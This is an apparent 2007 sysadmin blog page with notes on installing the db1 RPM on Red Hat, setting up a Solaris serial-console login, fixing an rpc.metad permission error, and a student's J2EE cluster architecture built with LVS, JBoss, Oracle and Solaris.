[root@oemgc ~]# wget ftp://fr.rpmfind.net/linux/redhat/7.3/en/os/i386/RedHat/RPMS/db1-1.85-8.i386.rpm
--12:32:23-- ftp://fr.rpmfind.net/linux/redhat/7.3/en/os/i386/RedHat/RPMS/db1-1.85-8.i386.rpm
=> `db1-1.85-8.i386.rpm'
Resolving fr.rpmfind.net... 194.199.20.114
Connecting to fr.rpmfind.net|194.199.20.114|:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /linux/redhat/7.3/en/os/i386/RedHat/RPMS ... done.
==> SIZE db1-1.85-8.i386.rpm ... 42581
==> PASV ... done. ==> RETR db1-1.85-8.i386.rpm ... done.
Length: 42581 (42K)
100%[=============================================================>] 42,581 230K/s in 0.2s
12:32:25 (230 KB/s) - `db1-1.85-8.i386.rpm' saved [42581]
[root@oemgc ~]# rpm -Uhv db1-1.85-8.i386.rpm
warning: db1-1.85-8.i386.rpm: Header V3 DSA signature: NOKEY, key ID db42a60e
Preparing... ########################################### [100%]
1:db1 ########################################### [100%]
[root@oemgc ~]# rpm -ql db1
/usr/bin/db1_dump185
/usr/lib/libdb.so.2
/usr/lib/libdb1.so.2
/usr/share/doc/db1-1.85
/usr/share/doc/db1-1.85/LICENSE
/usr/share/doc/db1-1.85/README
/usr/share/doc/db1-1.85/changelog
[root@oemgc ~]#

links 13/11/2007

November 13th, 2007

Setting up login on serial port on Solaris

November 8th, 2007

1. Ensure that there is are no services defined using: pmadm -l (in order to
remove use pmadm -r -p <name1> -s <name2> where name1 && name2 are taken from
pmadm -l output ).

2. Place serial port parameters in /etc/ttydefs:
echo “conttymy:9600 hupcl:9600 hupcl::” >> /etc/ttydefs

3. Execute:
pmadm -a -p zsmon -s ttya -i root -fu -v `ttyadm -V` -m “`ttyadm -m ldterm,ttcompat -p ‘Enter_your_Hostname login: ‘ -S n -T vt100 -d /dev/term/a -l conttymy -s /usr/bin/login`”

4. Verify by using: pmadm -l

5. Try connecting from the other end(KVM/other server).

6. To allow root login from serial edit /etc/default/login file and comment out CONSOLE=/dev/console (allows root login).

rpc.metacld or rpc.metad: Permission denied on Solaris 10u4

September 13th, 2007

If for some reason you got the “rpc.metad: <hostname>: Permission denied” error while creating multiowner metaset (eg. for Oracle RAC; metaset -s oradg -M …) edit the /etc/group and add root to sysadmin group. Next, try to retry the command.

This error is strange strange, because I haven’t got it while creating metasets on S10U3. Hm.

My engineering work…

August 15th, 2007

As of May I’m very busy architecting & implementing cluster for Java Enterprise Edition on comodity hardware (mainly x86_32 based) for my engineering work – to obtain BEng title. Our subject is:
“Web service based on scalable and highly available J2EE application cluster”. We have team consisting of 4 persons in which I’m responsible for all kind of systems/hardware scaling/clusters/load balancing/databases/networking/tunning everything :) . What kind of portal we are creating is to be decided by developers (it will likely be some kind of Web 2.0 portal).
Rest of the team is dedicated to J2EE programming. We are mainly playing with technology.
Currently rock-solid base core cluster architecture looks like this:

Cluster architecture

We are utilizing:

  • Load balancers: Linux Virtual Servers with DirectRouting on CentOS5 (configured as a part of Redhat Cluster Suite)
  • Database: Oracle10g R2
  • Middleware: JBOSS 4.2.0 (EJB3) running in a cluster based on JGroups + Hibernate(JPA) + JBOSS Cache
  • Frontend: Apache2 webservers with Solaris Network Cache Accelerator and AJP proxy to JBOSS servers
  • Solaris Jumpstart to setup new systems really fast with our selfwritten application in PHP for maintaing systems.
  • NFS for providing static content for web servers from Oracle server (yay! dedicated NetApp would be great! ;) )
  • LDAP to synchronize admins accounts inside cluster.
  • SNMPv2(LVS,OSes,JBOSS,Oracle) to monitor everything with single (selfwritten) Java application which graphs everything in realtime.

As this is basic configuration with database as an single point of failure, in Septemer I’m going to setup DataGuard for Oracle. Also I’m testing more advanced scale up. Currently I’m in process of setting up Solaris Cluster with Oracle RAC 10gR2 implemented on iSCSI storage provided by third node based on Solaris Nevada with iSCSI target to test Transparent Application Failover. I’ve been scratching my head over this one for awhile now. Yeah, it is real hardcore… more over that’s not the end of the story – Disaster Recovery with some other interesting bits of technology is going to be implemented later on… all on x86_32 comodity hardware :) Also we are going to put C-JDBC(Sequoia project) under stress…